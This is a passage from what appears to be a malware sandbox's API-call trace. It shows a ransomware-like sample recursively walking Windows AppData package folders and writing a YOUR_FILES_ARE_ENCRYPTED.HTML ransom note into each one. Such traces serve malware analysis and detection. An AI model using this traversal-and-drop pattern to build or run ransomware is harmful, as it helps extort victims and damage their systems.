pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\TempState") returned 94 [0115.506] GetProcessHeap () returned 0x600000 [0115.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.506] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\TempState" [0115.506] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\TempState\\*" [0115.506] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c4fed09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c4fed09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.506] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c4fed09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c4fed09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="..", cAlternateFileName="")) returned 1 [0115.506] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c4fed09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c4fed09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="..", cAlternateFileName="")) returned 0 [0115.506] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.506] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0115.507] GetProcessHeap () returned 0x600000 [0115.507] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.507] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingweather_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.507] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.508] CloseHandle (hObject=0x32c) returned 1 [0115.508] GetProcessHeap () returned 0x600000 [0115.508] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.509] GetProcessHeap () returned 0x600000 [0115.509] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.509] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c4fed09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c4fed09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0115.509] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.509] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0115.509] GetProcessHeap () returned 0x600000 [0115.509] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingweather_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0115.509] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0115.510] CloseHandle (hObject=0x320) returned 1 [0115.510] GetProcessHeap () returned 0x600000 [0115.510] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.511] GetProcessHeap () returned 0x600000 [0115.511] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0115.512] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e7503f8, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.BioEnrollment_cw5n1h2txyewy", cAlternateFileName="MICROS~1.BIO")) returned 1 [0115.512] StrStrIW (lpFirst="Microsoft.BioEnrollment_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.512] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy") returned 86 [0115.512] GetProcessHeap () returned 0x600000 [0115.512] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0115.513] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy" [0115.513] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\*" [0115.513] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e7503f8, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f0d99c3, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626878 [0115.514] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e7503f8, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f0d99c3, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0115.514] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0115.514] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.514] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC") returned 89 [0115.514] GetProcessHeap () returned 0x600000 [0115.514] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.515] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC" [0115.515] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\*" [0115.515] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.516] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="..", cAlternateFileName="")) returned 1 [0115.516] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0115.516] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.516] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCache") returned 99 [0115.516] GetProcessHeap () returned 0x600000 [0115.516] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.518] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCache" [0115.518] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCache\\*" [0115.518] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315e000, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0115.518] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315e000, cFileName="..", cAlternateFileName="")) returned 1 [0115.518] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315e000, cFileName="..", cAlternateFileName="")) returned 0 [0115.518] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0115.519] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0115.519] GetProcessHeap () returned 0x600000 [0115.519] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.519] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bioenrollment_cw5n1h2txyewy\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.520] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.521] CloseHandle (hObject=0x324) returned 1 [0115.521] GetProcessHeap () returned 0x600000 [0115.521] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.521] GetProcessHeap () returned 0x600000 [0115.521] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.522] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0115.522] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.522] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCookies") returned 101 [0115.522] GetProcessHeap () returned 0x600000 [0115.522] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.523] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCookies" [0115.523] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCookies\\*" [0115.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315e000, cFileName=".", cAlternateFileName="")) returned 0x626978 [0115.523] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315e000, cFileName="..", cAlternateFileName="")) returned 1 [0115.524] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315e000, cFileName="..", cAlternateFileName="")) returned 0 [0115.524] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0115.524] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0115.524] GetProcessHeap () returned 0x600000 [0115.524] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.524] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bioenrollment_cw5n1h2txyewy\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.525] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.526] CloseHandle (hObject=0x324) returned 1 [0115.526] GetProcessHeap () returned 0x600000 [0115.526] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.526] GetProcessHeap () returned 0x600000 [0115.526] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.527] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4e9402ca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e9402ca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e9402ca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0115.527] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.527] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetHistory") returned 101 [0115.527] GetProcessHeap () returned 0x600000 [0115.527] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.528] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetHistory" [0115.528] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\AC\\INetHistory\\*") 